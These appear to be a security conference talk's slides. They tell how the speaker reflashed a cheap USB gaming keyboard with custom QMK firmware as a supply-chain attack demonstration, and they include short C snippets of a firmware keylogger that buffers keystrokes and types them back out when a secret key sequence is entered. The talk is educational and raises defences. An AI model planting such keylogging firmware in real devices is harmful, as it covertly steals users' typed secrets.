A Practical Supply Chain Hack

Blinking RGBs for fun & profit.

A "Shaggy Dog" hacking story

Who Am I? - Dale Nunns

Father, Husband, Software Developer, Hardware Hacker, Maker, Retro Computer Enthusiast, Pizza Maker

• Team-Lead & Senior Software Developer at StructureIT building distributed, big data systems for the structured finance markets.
• In my free time I take things apart and occasionally they go back together.
• Most famous for posting way too many photos of home-made Pizza on Twitter
• Regular speaker at BSides Cape Town & DevConf

I'm a jack of all trades, serial skill collector and high-functioning hoarder.

• I'm not a nation-state hacker.

• I'm not employed by a 3 letter agency.

• I'm not here to sell you tools or services.

• I'm not even "in" infosec.

• I'm just a guy who enjoys taking things apart.

• This talk is not about scaring you, its about showing you a whole new world

What is a Supply Chain ?

• A supply chain is a system of organizations, people, activities, information and resources involved in moving a product or service from supplier to customer.

• It’s all the steps that need to happen for a product to get from where it is produced to where it’s sold

What is a supply chain hack?

What is a supply chain hack?

BSides Cape Town 2018 - Lightning Talk

In 2018 this was probably one of the most widely discussed "Supply Chain Hack".

Bloomberg Business - The Big Hack

1970's - Cold War

The USSR built a bug that they installed into a bunch of IBM Selectric II typewriters for use by the US Embassy.

CryptoMuseum: Selectric bug

2008-2009 NSA ANT Catalog

The NSA ANT catalog is a 50-page classified document listing technology available to the United States National Security Agency (NSA) Tailored Access Operations (TAO) by the Advanced Network Technology (ANT) Division to aid in cyber surveillance.

2010 - NSA “upgrade” CISCO Hardware

NSA TAO (Tailored Access Operations) Unit intercepted and "upgraded" hardware shipped to organizations targeted for surveillance. - Ars Technica

Can we I build it?

Some basic constraints

• Cheap

• Minimal Tools / Equipment / Skills
• Easily Reproducible
• Hard to detect
• Practical

• Need to be able to sneak it past my wife.

Hands-up

• Who uses a wired USB Keyboard?

• Who has typed something on their keyboard they need/want to keep a secret?

• Who of you would like a free RGB Gaming Keyboard?

Why Keyboards?

• Cheap
• Easily Available
• Everyone uses them
• You type your secrets on them

• My wife won't find a few of them arriving too suspicious (I hope )

How Modern Keyboards Work

• Keyboard Matrix (A,B,C,D)
• Keyboard Controller / Microcontroller
• USB
• RGB LED Controller

Part II - The Shaggy Dog Hacking Story

A tale of serendipitous discovery.

• Dragons
• LEDs
• And turning devices into paper-weights

Projects / Talks - Expectation

Projects / Talks - Reality

Foxxray Chronus - FXR-HKM-80

Nice Keyboard, brain-dead key mapping.

Foxxray Chronus

• SX93F93BN
• Appears to be made by SHINETEK
• No information online
• Closest Datasheet was a for a SX93099-200F
• No software update from Foxxray

QMK Firmware

• QMK https://qmk.fm/
• Opensource firmware
• Used by lots of community made custom keyboards
• There are other similar projects like ZMK (http://zmk.dev)
• For use with Arduino, Teensy and Pi Pico microcontroller dev-boards.

SonixQMK

• SonixQMK https://github.com/SonixQMK
• Opensource
• Port of QMK to the Sonix SN32 Microcontroller (ARM Cortex-M0)
• Supports some keyboards by Keychron and Redragon along with some other keyboard manufacturers

Redragon K630W

Nice Keyboard and supposedly supported by SonixQMK

Redragon K630W

• Vision VS11K28A
• Not supported by SonixQMK (SonixQMK does support other Vision ICs which are rebranded Sonix ICs)
• No Datasheet online

Redragon K630W

• SonixQMK only supports the Redragon K630
• The Redragon K630W is the same keyboard but with a totally different microcontroller.
• All I can find online is hints its 8051 based
• No software updates available online for the Redragon K630W

VS11K28A

• Redragon_K589RGB-8409_V0100-VS11K28A-CN_EN-20220825.zip
• Running it, it detected the keyboard and immediately put it into Bootloader mode
• Nothing I do will get it out of bootloader mode.
• Device now shows up as a Microdia CH555 instead of EVision RGB Keyboard

WCH

• Best known for making the CH343G USB to TTL Serial Converter
• WCH have RISC-V and Arm Cortex-M Microcontrollers

CH555

• E8051 - Enhanced 8051 architecture
• Not listed on the WCH site anywhere
• Could be supported by SDCC (Small Device C Compiler)

What next?

• Reverse engineer the firmware update application to be able to get the protocol used to program the keyboard.
• Find and setup a build environment for the microcontroller.
• Reverse engineer the keyboard wiring.
• Write new firmware.

The problem?

The only flux-capacitor I have is this one and it's running some dodgy BASIC firmware.

I'm a high-functioning hoarder.

Marvo Keyboard - K6901

• I bought this for R 59.00 from Cash Converters about 3 years ago, for "reasons".
• It's been in my "to hack" cupboard/pile/room waiting ever since.

Marvo K6901 - Keyboard

• Vision VS11K15A
• Which is actually a SONIX SN32F268 (ARM Cortex-M0)
• This micro controller is supported by SonixQMK

Bootloader / Jumploader

• Click the button to Reboot to Bootloader [eVision]
• Burn the jumploader-generic.bin from the sonix-keyboard-bootloader repo. This is a generic SN32F260 boot loader.

Mapping the keyboard

• Hot beverage & Sea Shanties are essential

Logging Keys

static uint16_t keylog[MAX_KEYLOG_BUFFER_LENGTH];
static int keylogPos = 0;

bool process_record_kb(uint16_t keycode, keyrecord_t *record) {
	if (record->event.pressed) {log_key(keycode, record);}
	return process_record_user(keycode, record);
}

void log_key(uint16_t keycode, keyrecord_t *record) {
	keylog[keylogPos] = keycode;
	keylogPos++;
	if (keylogPos >= MAX_KEYLOG_BUFFER_LENGTH) {keylogPos = 0;}
}

Dump Keys

//uint16_t dumpKey[] = {KC_H,KC_U,KC_N,KC_T,KC_E,KC_R,KC_3};
uint16_t dumpKey[] = {KC_UP,KC_UP,KC_DOWN,KC_DOWN,KC_LEFT,KC_RIGHT,KC_LEFT,KC_RIGHT,KC_A,KC_B};
static int dumpKeyPos = 0;

bool process_record_user(uint16_t keycode, keyrecord_t *record) {
	if (record->event.pressed) {
		if (keycode == dumpKey[dumpKeyPos]) {
			dumpKeyPos++;
			if (dumpKeyPos > (sizeof(dumpKey) /sizeof(dumpKey[0])) -1 ) {
				SEND_STRING("\nAll Your String Belong To Us\n");				
				dump_keylog();				
				SEND_STRING("\n--------\n");
			}
		} else {dumpKeyPos =0;}
	}
 
	return true;
}

Demo Time

Wrapping Up

• Can this be improved ?
• How do you protect yourself from this kind of attack ?

Follow, Subscribe, Like etc